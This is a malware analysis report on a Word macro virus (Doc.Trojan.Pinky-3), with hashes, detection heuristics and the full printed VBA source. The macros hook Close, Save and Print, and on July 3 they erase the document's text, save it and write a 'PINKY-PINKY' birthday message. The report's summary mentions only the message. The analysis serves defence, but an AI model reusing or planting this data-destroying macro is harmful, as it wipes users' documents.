Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 88c94cdfa662e4d8…

MALICIOUS

Office (OLE)

39.5 KB Created: 2000-04-09 04:30:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 048571fc49380129e96b6fd599bb3de1 SHA-1: ee7e81c12ee18c0ea96e358cff55018acb960bfe SHA-256: 88c94cdfa662e4d8b9e99fb5b565b6b9f903e7d3f744663cb96ea6282f8e2f58
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Pinky-3'. It contains VBA macros that execute when the document is opened. The macro checks if the current date is July 3rd, and if so, it displays a specific message ('PINKY-PINKY' and a birthday wish) before closing the document. This behavior suggests a potentially customized or time-based lure, though no further malicious actions like network communication or file dropping were observed.

Heuristics 2

  • ClamAV: Doc.Trojan.Pinky-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Pinky-3
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3742 bytes
SHA-256: aca3dd22177e8d56cf69d7861226222a901719bfb580fb831d66336104ad5966
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ArchivoCerrar"
Public Sub ArchivoCerrar()
'
' ArchivoImprimir Macro
' Imprime el documento activo de Microsoft Word.
'
If WordBasic.Day(WordBasic.Now()) = 3 And WordBasic.Month(WordBasic.Now()) = 7 Then
    Selection.WholeStory
    Selection.Delete Unit:=wdCharacter, Count:=1
    ActiveDocument.Save
    Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
    Selection.Font.Size = 48
    Selection.Font.Color = wdColorRed
    Selection.TypeText Text:="PINKY-PINKY"
    Selection.TypeParagraph
    Selection.Font.Color = wdColorAutomatic
    Selection.Font.Size = 28
    Selection.TypeText Text:="Te dice:"
    Selection.TypeParagraph
    Selection.TypeParagraph
    Selection.TypeText Text:="""El 3 de julio es mi cumpleaños,"
    Selection.TypeParagraph
    Selection.TypeText Text:="espero que te acuerdes de mí"""
    Selection.TypeParagraph
    ActiveDocument.Save
    Application.Dialogs.Application.EnableCancelKey = wdCancelInterrupt
    ActiveDocument.Close
Else
    ActiveDocument.Close
End If
End Sub


Attribute VB_Name = "ArchivoGuardar"
Public Sub ArchivoGuardar()
'
' ArchivoImprimir Macro
' Imprime el documento activo de Microsoft Word.
'
If WordBasic.Day(WordBasic.Now()) = 3 And WordBasic.Month(WordBasic.Now()) = 7 Then
    Selection.WholeStory
    Selection.Delete Unit:=wdCharacter, Count:=1
    ActiveDocument.Save
    Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
    Selection.Font.Size = 48
    Selection.Font.Color = wdColorRed
    Selection.TypeText Text:="PINKY-PINKY"
    Selection.TypeParagraph
    Selection.Font.Color = wdColorAutomatic
    Selection.Font.Size = 28
    Selection.TypeText Text:="Te dice:"
    Selection.TypeParagraph
    Selection.TypeParagraph
    Selection.TypeText Text:="""El 3 de julio es mi cumpleaños,"
    Selection.TypeParagraph
    Selection.TypeText Text:="espero que te acuerdes de mí"""
    Selection.TypeParagraph
    ActiveDocument.Save
    Application.Dialogs.Application.EnableCancelKey = wdCancelInterrupt
    ActiveDocument.Close
Else
    ActiveDocument.Save
End If
End Sub


Attribute VB_Name = "ArchivoImprimir"
Public Sub ArchivoImprimir()
Attribute ArchivoImprimir.VB_Description = "Imprime el documento activo de Microsoft Word."
Attribute ArchivoImprimir.VB_ProcData.VB_Invoke_Func = "TemplateProject.NewMacros.ArchivoImprimir"
'
' ArchivoImprimir Macro
' Imprime el documento activo de Microsoft Word.
'
If WordBasic.Day(WordBasic.Now()) = 3 And WordBasic.Month(WordBasic.Now()) = 7 Then
    Selection.WholeStory
    Selection.Delete Unit:=wdCharacter, Count:=1
    ActiveDocument.Save
    Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
    Selection.Font.Size = 48
    Selection.Font.Color = wdColorRed
    Selection.TypeText Text:="PINKY-PINKY"
    Selection.TypeParagraph
    Selection.Font.Color = wdColorAutomatic
    Selection.Font.Size = 28
    Selection.TypeText Text:="Te dice:"
    Selection.TypeParagraph
    Selection.TypeParagraph
    Selection.TypeText Text:="""El 3 de julio es mi cumpleaños,"
    Selection.TypeParagraph
    Selection.TypeText Text:="espero que te acuerdes de mí"""
    Selection.TypeParagraph
    ActiveDocument.Save
    Application.Dialogs.Application.EnableCancelKey = wdCancelInterrupt
    ActiveDocument.Close
Else
    ActiveDocument.PrintOut
End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.